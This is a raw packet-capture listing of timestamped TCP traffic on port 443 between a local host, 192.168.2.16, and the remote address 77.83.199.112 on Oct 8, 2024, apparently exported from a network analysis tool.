                                                                                                                                                  Oct 8, 2024 15:23:30.704369068 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.704369068 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.704718113 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.704735994 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.704983950 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.704983950 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.704993010 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.705279112 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.705396891 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.705411911 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.705498934 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.705503941 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.705897093 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.706298113 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.706314087 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.706456900 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.706460953 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.706536055 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.712985992 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.713006973 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.713167906 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.713174105 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.713568926 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.713587046 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.713608027 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.713613033 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.713629961 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.713705063 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.791315079 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.791338921 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.791418076 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.791430950 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.791497946 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.791497946 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.791996956 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.792013884 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.792228937 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.792238951 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.792300940 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.792316914 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.792324066 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.792535067 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.792535067 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.792923927 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.792941093 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.793287992 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.793298006 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.793350935 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.793525934 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.793540955 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.793612003 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.793618917 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.793670893 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.794177055 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.794195890 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.794332027 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.794338942 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.794461012 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.797379971 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.797399044 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.797497988 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.797498941 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.797513008 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.797668934 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.800874949 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.800890923 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.800968885 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.800976038 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.801096916 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.839711905 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.839797020 CEST4434970577.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:30.839844942 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.839983940 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.839983940 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:30.840095043 CEST49705443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:43.421005964 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:43.421071053 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:43.421175003 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:43.430324078 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:43.430360079 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:43.969883919 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:43.969988108 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:43.971782923 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:43.971796036 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:43.972058058 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:43.981434107 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.023405075 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.130671024 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.130691051 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.130779028 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.130795002 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.175134897 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.221921921 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.221939087 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.222043037 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.222054958 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.222076893 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.222081900 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.222129107 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.224201918 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.224231005 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.224291086 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.224298954 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.224354982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.312536001 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.312572956 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.312674999 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.312696934 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.312757015 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.314178944 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.314202070 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.314258099 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.314265966 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.314434052 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.316086054 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.316104889 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.316165924 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.316174030 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.316220045 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.338990927 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.339019060 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.339090109 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.339101076 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.339157104 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.402967930 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.402992964 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.403080940 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.403100967 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.403444052 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.403898001 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.403913975 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.403969049 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.403980017 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.404181004 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.404845953 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.404864073 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.404930115 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.404941082 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.405015945 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.405891895 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.405911922 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.406080961 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.406090021 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.406591892 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.407525063 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.407543898 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.407604933 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.407614946 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.407675982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.429436922 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429486990 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429544926 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.429574013 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429585934 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.429614067 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.429872036 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429913998 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429946899 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.429955959 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.429981947 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.430005074 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499521017 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499547958 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499599934 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499612093 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499638081 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499667883 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499675035 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499706984 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499715090 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499751091 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499752998 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499763966 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499788046 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499808073 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499821901 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499829054 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499840021 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.499882936 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.499918938 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.522768974 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.522793055 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.522861958 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.522876024 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.522922039 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.523160934 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.523183107 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.523226023 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.523233891 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.523256063 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.574198008 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585196972 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585270882 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585309982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585325003 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585349083 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585371017 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585588932 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585649014 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585694075 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585702896 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585714102 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585751057 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585793018 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585803986 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585823059 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585839033 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.585872889 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.585943937 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.586127043 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.586170912 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.586204052 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.586218119 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.586245060 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.586276054 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.586585999 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.586633921 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.586672068 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.586678028 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.586719036 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.586730957 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.586951971 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.586972952 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.587029934 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.587037086 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.587069988 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.587111950 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.610920906 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.610940933 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.611018896 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.611040115 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.611397982 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.611821890 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.611840010 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.611917973 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.611927986 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.611995935 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.675307035 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.675357103 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.675496101 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.675509930 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.675597906 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.675726891 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.675771952 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.675800085 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.675806999 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.675836086 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.675865889 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.675915003 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.675961971 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.675988913 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.675995111 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.676018953 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.676045895 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.676341057 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.676383972 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.676414013 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.676420927 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.676445961 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.676465034 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.676794052 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.676839113 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.676876068 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.676882982 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.676914930 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.676934958 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.677074909 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.677117109 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.677143097 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.677150011 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.677175045 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.677206039 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.701900005 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.701917887 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.701992035 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.702002048 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.702070951 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.702213049 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.702233076 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.702312946 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.702322960 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.702430964 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.767370939 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.767463923 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.767498016 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.767509937 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.767565966 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.767576933 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.767776966 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.767822981 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.767857075 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.767863035 CEST4434970777.83.199.112192.168.2.16
                                                                                                                                                  Oct 8, 2024 15:23:44.767894030 CEST49707443192.168.2.1677.83.199.112
                                                                                                                                                  Oct 8, 2024 15:23:44.767931938 CEST49707443192.168.2.1677.83.199.112
